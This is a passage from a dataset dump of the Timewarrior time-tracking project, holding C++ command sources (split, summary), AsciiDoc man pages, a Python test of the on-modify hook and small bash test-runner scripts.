<cmake.h>\n#include <Duration.h>\n#include <format.h>\n#include <commands.h>\n#include <timew.h>\n#include <iostream>\n#include <stdlib.h>\n\n////////////////////////////////////////////////////////////////////////////////\nint CmdSplit (\n const CLI& cli,\n Rules& rules,\n Database& database,\n Journal& journal)\n{\n const bool verbose = rules.getBoolean (\"verbose\");\n\n std::set <int> ids = cli.getIds ();\n\n if (ids.empty ())\n {\n throw std::string (\"IDs must be specified. See 'timew help split'.\");\n }\n\n journal.startTransaction ();\n\n std::vector <Interval> intervals = getIntervalsByIds (database, rules, ids);\n\n // Apply tags to ids.\n for (const auto& interval : intervals)\n {\n Interval first = interval;\n Interval second = first;\n\n if (first.is_open ())\n {\n Datetime midpoint;\n midpoint -= (midpoint - first.start) / 2;\n first.end = midpoint;\n second.start = midpoint;\n }\n else\n {\n Datetime midpoint = first.start;\n midpoint += (first.end - first.start) / 2;\n first.end = midpoint;\n second.start = midpoint;\n }\n\n database.deleteInterval (interval);\n\n validate (cli, rules, database, first);\n database.addInterval (first, verbose);\n\n validate (cli, rules, database, second);\n database.addInterval (second, verbose);\n\n if (verbose)\n {\n std::cout << \"Split @\" << interval.id << '\\n';\n }\n }\n\n journal.endTransaction ();\n\n return 0;\n}\n\n////////////////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.7118644118309021, "alphanum_fraction": 0.7207425236701965, "avg_line_length": 27.159090042114258, "blob_id": "5b904ab4372a31620e5b9b81620381ba054d156f", "content_id": "c725f8b7e59472caecd5b4c6e0701a6797d4903f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 1239, "license_type": "permissive", "max_line_length": 116, "num_lines": 44, "path": "/doc/man1/timew-annotate.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-annotate(1)\n\n== NAME\ntimew-annotate - add an annotation to intervals\n\n== SYNOPSIS\n[verse]\n*timew annotate* [_<id>_**...**] _<annotation>_**...**\n\n== DESCRIPTION\nThe 'annotate' command is used to add an annotation to an interval.\nUsing the 'summary' command, and specifying the ':ids' hint shows interval IDs.\nUsing the right ID, you can identify an interval to annotate.\n\n== EXAMPLES\nFor example, show the IDs:\n\n $ timew summary :week :ids\n\nThen having selected '@2' as the interval you wish to annotate:\n\n $ timew annotate @2 'Lorem ipsum...'\n\nNote that you can annotate multiple intervals with the same annotation:\n\n $ timew annotate @2 @10 @23 'Lorem ipsum dolor sit amet...'\n\nIf there is active time tracking, you can omit the ID when you want to add annotations to the current open interval:\n\n $ timew start foo\n $ timew annotate bar\n\nThis results in the current interval having annotations 'foo' and 'bar'.\n\n== BUGS\nCurrently the annotation command picks the last token from the command line and uses it as annotation.\nI.e. using no quotes in an annotation command like\n\n $ timew annotate @1 lorem ipsum dolor\n\nwill result in interval @1 having only 'dolor' as its annotation.\n\n== SEE ALSO\n**timew-tag**(1)\n" }, { "alpha_fraction": 0.5154243111610413, "alphanum_fraction": 0.651758074760437, "avg_line_length": 46.825111389160156, "blob_id": "8f21d1739bcf4b5992a90f195891eaa6f53c1c48", "content_id": "8362f1a5f1327cfc2740be8aec6be1fcf3befeb4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10665, "license_type": "permissive", "max_line_length": 242, "num_lines": 223, "path": "/test/test_on-modify.timewarrior.t", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n###############################################################################\n#\n# Copyright 2019 - 2020, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# https://www.opensource.org/licenses/mit-license.php\n#\n###############################################################################\n\nimport os\nimport subprocess\nimport unittest\n\nimport sys\n\n# Ensure python finds the local simpletap module\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom basetest import Timew, TestCase\n\n\nclass TestOnModifyHookScript(TestCase):\n def setUp(self):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n self.t = Timew()\n\n self.process = subprocess.Popen([os.path.join(current_dir, '../ext/on-modify.timewarrior')],\n env={\n 'PATH': '../src:' + os.environ['PATH'],\n 'TIMEWARRIORDB': self.t.datadir\n },\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n def test_hook_should_process_annotate(self):\n \"\"\"on-modify hook should process 'task annotate'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"3495a755-c4c6-4106-aabe-c0d3d128b65a\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"3495a755-c4c6-4106-aabe-c0d3d128b65a\",\"annotations\":[{\"entry\":\"20190820T201911Z\",\"description\":\"Annotation\"}]}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"], expectedAnnotation=\"Annotation\")\n\n def test_hook_should_process_append(self):\n \"\"\"on-modify hook should process 'task append'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"da603270-ce2b-4a5a-9273-c67c2d2d0067\"}\n{\"description\":\"Foo Bar\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"da603270-ce2b-4a5a-9273-c67c2d2d0067\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo Bar\"])\n\n def test_hook_should_process_delete(self):\n \"\"\"on-modify hook should process 'task delete'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"25b66283-96e0-42b4-b835-8efd0ea1043c\"}\n{\"description\":\"Foo\",\"end\":\"20190820T201911Z\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"deleted\",\"uuid\":\"25b66283-96e0-42b4-b835-8efd0ea1043c\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_denotate(self):\n \"\"\"on-modify hook should process 'task denotate'\"\"\"\n self.t(\"start 10min ago Foo\")\n self.t(\"annotate @1 Annotation\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"8811cc93-a495-4fa6-993e-2b96cffc48e0\",\"annotations\":[{\"entry\":\"20190820T201911Z\",\"description\":\"Annotation\"}]}\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"8811cc93-a495-4fa6-993e-2b96cffc48e0\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"], expectedAnnotation=\"\")\n\n def test_hook_should_process_done(self):\n \"\"\"on-modify hook should process 'task done'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201912Z\",\"modified\":\"20190820T201912Z\",\"start\":\"20190820T201912Z\",\"status\":\"pending\",\"uuid\":\"c418b958-5c3c-4633-89a4-4a2f678d74d0\"}\n{\"description\":\"Foo\",\"end\":\"20190820T201912Z\",\"entry\":\"20190820T201912Z\",\"modified\":\"20190820T201912Z\",\"status\":\"completed\",\"uuid\":\"c418b958-5c3c-4633-89a4-4a2f678d74d0\"}\n\"\"\")\n\n self.assertEqual(b'', err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_modify_desc(self):\n \"\"\"on-modify hook should process 'task modify' for changing description\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203416Z\",\"modified\":\"20190820T203416Z\",\"start\":\"20190820T203416Z\",\"status\":\"pending\",\"uuid\":\"189e6745-04e0-4b17-949f-900cf63ab8d9\"}\n{\"description\":\"Bar\",\"entry\":\"20190820T203416Z\",\"modified\":\"20190820T203416Z\",\"start\":\"20190820T203416Z\",\"status\":\"pending\",\"uuid\":\"189e6745-04e0-4b17-949f-900cf63ab8d9\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Bar\"])\n\n def test_hook_should_process_modify_tags(self):\n \"\"\"on-modify hook should process 'task modify' for changing tags\"\"\"\n self.t(\"start 10min ago Foo Tag Bar\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203620Z\",\"modified\":\"20190820T203620Z\",\"start\":\"20190820T203620Z\",\"status\":\"pending\",\"tags\":[\"Tag\",\"Bar\"],\"uuid\":\"6cab88f0-ac12-4a87-995a-0e7d39810c05\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203620Z\",\"modified\":\"20190820T203620Z\",\"start\":\"20190820T203620Z\",\"status\":\"pending\",\"tags\":[\"Tag\",\"Baz\"],\"uuid\":\"6cab88f0-ac12-4a87-995a-0e7d39810c05\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\", \"Tag\", \"Baz\"])\n\n def test_hook_should_process_modify_project(self):\n \"\"\"on-modify hook should process 'task modify' for changing project\"\"\"\n self.t(\"start Foo dummy\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"project\":\"dummy\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"d95dc7a0-6189-4692-b58a-4ab60d539c8d\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"project\":\"test\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"d95dc7a0-6189-4692-b58a-4ab60d539c8d\"}\n\"\"\")\n\n self.assertEqual(b'', err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\", \"test\"])\n\n def test_hook_should_process_prepend(self):\n \"\"\"on-modify hook should process 'task prepend'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"02bc8839-b304-49f9-ac1a-29ac4850583f\"}\n{\"description\":\"Prefix Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"02bc8839-b304-49f9-ac1a-29ac4850583f\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Prefix Foo\"])\n\n def test_hook_should_process_start(self):\n \"\"\"on-modify hook should process 'task start'\"\"\"\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"16af44c5-57d2-43bf-97ed-cf2e541d927f\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"16af44c5-57d2-43bf-97ed-cf2e541d927f\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_stop(self):\n \"\"\"on-modify hook should process 'task stop'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"13f83e99-f6a2-4857-9e00-bdeede064772\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"13f83e99-f6a2-4857-9e00-bdeede064772\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n\nif __name__ == \"__main__\":\n from simpletap import TAPTestRunner\n unittest.main(testRunner=TAPTestRunner())\n" }, { "alpha_fraction": 0.6807453632354736, "alphanum_fraction": 0.6919254660606384, "avg_line_length": 23.393939971923828, "blob_id": "21abca2ba36e0c3b7f03245e44d3ab8caf04cf33", "content_id": "b610cc778625d624ed0b0cd03cd47a86af61b94a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 805, "license_type": "permissive", "max_line_length": 91, "num_lines": 33, "path": "/doc/man1/timew-summary.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-summary(1)\n\n== NAME\ntimew-summary - display a time-tracking summary\n\n== SYNOPSIS\n[verse]\n*timew summary* [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nDisplays a report summarizing tracked and untracked time for the current day by default.\nAccepts date ranges and tags for filtering, or shortcut hints:\n\n $ timew summary monday - today\n $ timew summary :week\n $ timew summary :month\n\nThe ':ids' hint adds an 'ID' column to the summary report output for interval modification.\n\n== CONFIGURATION\n**reports.summary.holidays**::\nDetermines whether relevant holidays are shown beneath the report.\nDefault value is 'yes'.\n\n== SEE ALSO\n**timew-day**(1),\n**timew-lengthen**(1),\n**timew-modify**(1),\n**timew-month**(1),\n**timew-shorten**(1),\n**timew-tag**(1),\n**timew-untag**(1),\n**timew-week**(1)\n" }, { "alpha_fraction": 0.7355555295944214, "alphanum_fraction": 0.7377777695655823, "avg_line_length": 25.47058868408203, "blob_id": "a3fd1029d217316db8e799251a11dd48ea2db49e", "content_id": "d3ceedff39371509623bce1fc4fdb69323f1b430", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 1350, "license_type": "permissive", "max_line_length": 152, "num_lines": 51, "path": "/doc/man7/timew-config.7.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-config(7)\n\n== NAME\ntimew-config - Timewarrior configuration file and override options\n\n== SYNOPSIS\n**timew rc.**__<name>__**=**__<value>__ _<command>_\n\n== DESCRIPTION\nTimewarrior stores its configuration in the user's home directory in _~/.timewarrior/timewarrior.cfg_.\nThis file contains a mix of rules and configuration settings.\nNote that the TIMEWARRIORDB environment variable can be set to override this location.\n\nThe values 'true', '1', 'y', 'yes' and 'on' are all equivalent and enable a setting.\nAny other value means disable the setting.\n\nDefault values may be overridden by timewarrior.cfg values, which may in turn be overridden on the command line using: **rc.**__<name>__**=**__<value>__\n\nFor example, to turn off verbose mode:\n\n rc.verbose=0\n\nNote that hints can also do this (:quiet).\n\n== CONFIGURATION\n\n*confirmation*::\nDetermines whether harmful operations require interactive confirmation.\n+\nMay be overridden by the ':yes' hint.\n+\nDefault value is 'yes'.\n\n*verbose*::\nDetermines whether Timewarrior generates feedback.\n+\nMay be overridden by the ':quiet' hint.\n+\nDefault value is 'yes'.\n\n*debug*::\nDetermines whether diagnostic debugging information is shown.\n+\nUseful for troubleshooting, but not for general use.\n+\nDefault value is 'off'.\n\n*debug.indicator*::\nThe debug output prefix string.\n+\nDefault value is '>>'.\n" }, { "alpha_fraction": 0.44556325674057007, "alphanum_fraction": 0.4669603407382965, "avg_line_length": 17.05681800842285, "blob_id": "9bab93fa48251624fe0fad8b401995d91fe2de19", "content_id": "45f128e420fcdb68bae0b0fae28cb27b3d233119", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1589, "license_type": "permissive", "max_line_length": 60, "num_lines": 88, "path": "/test/timemachine", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction default_dates()\n{\n case \"${OSTYPE}\" in\n darwin*)\n date \"+%Y-%m-%d\"\n ;;\n *)\n date --rfc-3339=date\n ;;\n esac\n}\n\nfunction default_minutes()\n{\n case \"${OSTYPE}\" in\n darwin*)\n echo \"0$( jot -r 1 0 59 )\" | sed -E \"s|.+(..)|\\1|g\"\n ;;\n *)\n echo \"0$( rand -M 60 )\" | sed \"s|.\\+\\(..\\)\\$|\\1|g\"\n ;;\n esac\n}\n\nfunction default_hours()\n{\n seq -w 0 23\n}\n\nif ! command -v faketime >/dev/null 2>&1 ; then\n echo \"timemachine requires libfaketime to be installed!\"\n exit 1\nfi\n\n# parse options/arguments\nuntil [[ -z \"${1}\" ]] ; do\n case \"${1}\" in\n --minute)\n shift\n minutes=\"${minutes} ${1}\"\n ;;\n --minutes)\n shift\n minutes=\"${1}\"\n ;;\n --hour)\n shift\n hours=\"${hours} ${1}\"\n ;;\n --hours)\n shift\n hours=\"${1}\"\n ;;\n --date)\n shift\n dates=\"${dates} ${1}\"\n ;;\n --fail-at-end)\n fail_at_end=1\n ;;\n -*)\n echo \"Unknown option '${1}'\"\n exit 1\n ;;\n *)\n tests=\"${tests} ${1}\"\n ;;\n esac\n shift\ndone\n\nfor date in ${dates-$( default_dates )} ; do\n for hour in ${hours-$( default_hours )} ; do\n for minute in ${minutes-$( default_minutes )} ; do\n date_time=\"${date}T${hour}:${minute}\"\n for single_test in ${tests} ; do\n echo \"Running test ${single_test} at ${date_time}\"\n\n if ! faketime \"${date_time}\" \"${single_test}\" ; then\n echo \"Test ${single_test} broke at ${date_time}!\"\n [[ ${fail_at_end-0} -ne 0 ]] || break 2\n fi\n done\n done\n done\ndone\n" }, { "alpha_fraction": 0.6812933087348938, "alphanum_fraction": 0.6836027503013611, "avg_line_length": 24.47058868408203, "blob_id": "d8025c1d9167cd09f7226beb39b55a8fdcb792bc", "content_id": "6c0009332999b1d4584f4086b4d731dce5a9df6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 433, "license_type": "permissive", "max_line_length": 92, "num_lines": 17, "path": "/doc/man1/timew-report.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-report(1)\n\n== NAME\ntimew-report - run an extension report\n\n== SYNOPSIS\n[verse]\n*timew* [*report*] _<report>_ [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nRuns an extension report, and supports filtering data.\nThe 'report' command itself is optional, which means that these two commands are equivalent:\n\n $ timew report foo :week\n $ timew foo :week\n\nThis does however assume there is a 'foo' extension installed.\n" }, { "alpha_fraction": 0.6258992552757263, "alphanum_fraction": 0.6294963955879211, "avg_line_length": 18.85714340209961, "blob_id": "f27a9fc09a64a14ba9a20a0ece543a21cfb5bd2b", "content_id": "b1f6f8ffa01c8c342db46d5f4f5e01beb72a4a06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 278, "license_type": "permissive", "max_line_length": 66, "num_lines": 14, "path": "/test/AtomicFile.t", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/bin/sh\nBASEDIR=$(dirname \"$0\")\n\nif [ \"$(uname -s)\" = \"Darwin\" ] ; then\n DLL_TOOL=\"otool -L\"\nelse\n DLL_TOOL=\"ldd\"\nfi\n\nif ${DLL_TOOL} ${BASEDIR}/AtomicFileTest | grep -q 'libfiu' ; then\n exec fiu-run -x ${BASEDIR}/AtomicFileTest\nelse\n exec ${BASEDIR}/AtomicFileTest\nfi\n" }, { "alpha_fraction": 0.5545921921730042, "alphanum_fraction": 0.5622993111610413, "avg_line_length": 28.239437103271484, "blob_id": "861fb2d7aacfdaab4fd79f13c40744a64690c292", "content_id": "0d45d05fa8be5b60e5bb862b6fec485049ee2f32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6228, "license_type": "permissive", "max_line_length": 103, "num_lines": 213, "path": "/src/commands/CmdSummary.cpp", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "////////////////////////////////////////////////////////////////////////////////\n//\n// Copyright 2016 - 2021, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included\n// in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n// SOFTWARE.\n//\n// https://www.opensource.org/licenses/mit-license.php\n//\n////////////////////////////////////////////////////////////////////////////////\n\n#include <Table.h>\n#include <Duration.h>\n#include <shared.h>\n#include <format.h>\n#include <commands.h>\n#include <timew.h>\n#include <iostream>\n\n// Implemented in CmdChart.cpp.\nstd::map <Datetime, std::string> createHolidayMap (Rules&, Interval&);\nstd::string renderHolidays (const std::map <Datetime, std::string>&);\n\n////////////////////////////////////////////////////////////////////////////////\nint CmdSummary (\n const CLI& cli,\n Rules& rules,\n Database& database)\n{\n const bool verbose = rules.getBoolean (\"verbose\");\n\n // Create a filter, and if empty, choose 'today'.\n auto filter = cli.getFilter (Range { Datetime (\"today\"), Datetime (\"tomorrow\") });\n\n // Load the data.\n auto tracked = getTracked (database, rules, filter);\n\n if (tracked.empty ())\n {\n if (verbose)\n {\n std::cout << \"No filtered data found\";\n\n if (filter.is_started ())\n {\n std::cout << \" in the range \" << filter.start.toISOLocalExtended ();\n if (filter.is_ended ())\n std::cout << \" - \" << filter.end.toISOLocalExtended ();\n }\n\n if (! filter.tags ().empty ())\n {\n std::cout << \" tagged with \" << joinQuotedIfNeeded (\", \", filter.tags ());\n }\n\n std::cout << \".\\n\";\n }\n\n return 0;\n }\n\n // Map tags to colors.\n auto palette = createPalette (rules);\n auto tag_colors = createTagColorMap (rules, palette, tracked);\n Color colorID (rules.getBoolean (\"color\") ? rules.get (\"theme.colors.ids\") : \"\");\n\n auto ids = findHint (cli, \":ids\");\n auto show_annotation = findHint (cli, \":annotations\");\n\n Table table;\n table.width (1024);\n table.colorHeader (Color (\"underline\"));\n table.add (\"Wk\");\n table.add (\"Date\");\n table.add (\"Day\");\n\n if (ids)\n {\n table.add (\"ID\");\n }\n\n table.add (\"Tags\");\n\n auto offset = 0;\n\n if (show_annotation)\n {\n table.add (\"Annotation\");\n offset = 1;\n }\n\n table.add (\"Start\", false);\n table.add (\"End\", false);\n table.add (\"Time\", false);\n table.add (\"Total\", false);\n\n // Each day is rendered separately.\n time_t grand_total = 0;\n Datetime previous;\n\n auto days_start = filter.is_started() ? filter.start : tracked.front ().start;\n auto days_end = filter.is_ended() ? filter.end : tracked.back ().end;\n\n if (days_end == 0)\n {\n days_end = Datetime ();\n }\n\n for (Datetime day = days_start.startOfDay (); day < days_end; ++day)\n {\n auto day_range = getFullDay (day);\n time_t daily_total = 0;\n\n int row = -1;\n for (auto& track : subset (day_range, tracked))\n {\n // Make sure the track only represents one day.\n if ((track.is_open () && day > Datetime ()))\n continue;\n\n row = table.addRow ();\n\n if (day != previous)\n {\n table.set (row, 0, format (\"W{1}\", day.week ()));\n table.set (row, 1, day.toString (\"Y-M-D\"));\n table.set (row, 2, day.dayNameShort (day.dayOfWeek ()));\n previous = day;\n }\n\n // Intersect track with day.\n auto today = day_range.intersect (track);\n if (track.is_open () && day <= Datetime () && today.end > Datetime ())\n today.end = Datetime ();\n\n std::string tags = join(\", \", track.tags());\n\n if (ids)\n {\n table.set (row, 3, format (\"@{1}\", track.id), colorID);\n }\n\n table.set (row, (ids ? 4 : 3), tags);\n\n if (show_annotation)\n {\n auto annotation = track.getAnnotation ();\n\n if (annotation.length () > 15)\n annotation = annotation.substr (0, 12) + \"...\";\n\n table.set (row, (ids ? 5 : 4), annotation);\n }\n\n table.set (row, (ids ? 5 : 4) + offset, today.start.toString (\"h:N:S\"));\n table.set (row, (ids ? 6 : 5) + offset, (track.is_open () ? \"-\" : today.end.toString (\"h:N:S\")));\n table.set (row, (ids ? 7 : 6) + offset, Duration (today.total ()).formatHours ());\n\n daily_total += today.total ();\n }\n\n if (row != -1)\n table.set (row, (ids ? 8 : 7) + offset, Duration (daily_total).formatHours ());\n\n grand_total += daily_total;\n }\n\n // Add the total.\n table.set (table.addRow (), (ids ? 8 : 7) + offset, \" \", Color (\"underline\"));\n table.set (table.addRow (), (ids ? 8 : 7) + offset, Duration (grand_total).formatHours ());\n\n const auto with_holidays = rules.getBoolean (\"reports.summary.holidays\");\n\n std::cout << '\\n'\n << table.render ()\n << (with_holidays ? renderHolidays (createHolidayMap (rules, filter)) : \"\")\n << '\\n';\n\n return 0;\n}\n\n////////////////////////////////////////////////////////////////////////////////\nstd::string renderHolidays (const std::map<Datetime, std::string> &holidays)\n{\n std::stringstream out;\n\n for (auto &entry : holidays)\n {\n out << entry.first.toString (\"Y-M-D\")\n << \" \"\n << entry.second\n << '\\n';\n }\n\n return out.str ();\n}\n\n////////////////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.79756098985672, "alphanum_fraction": 0.79756098985672, "avg_line_length": 44.66666793823242, "blob_id": "8844f7a8b86b2a9eb3c5ae8811c4122c670a625e", "content_id": "795699b730ad24d5ffd3bdff09f7428de45d7881", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "permissive", "max_line_length": 190, "num_lines": 9, "path": "/completion/README.md", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "# Shell completion\n\nThe script here is taken from a separate project.\nIssues and pull-requests should go there.\nThe updated version will then be included here.\n\nIf you are missing a completion, feel free to contribute.\n\n* `timew-completion.bash` is taken from https://github.com/lauft/timew-bashcompletion which is released under [MIT license](https://github.com/lauft/timew-bashcompletion/blob/master/LICENSE)" }, { "alpha_fraction": 0.7632086277008057, "alphanum_fraction": 0.7705360651016235, "avg_line_length": 34.0405387878418, "blob_id": "cf719d8a654f17cda6c26fc5bde32d004b612f47", "content_id": "29cfc468d26f06fc12fe89f45427d97efb6137f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2593, "license_type": "permissive", "max_line_length": 184, "num_lines": 74, "path": "/README.md", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "# 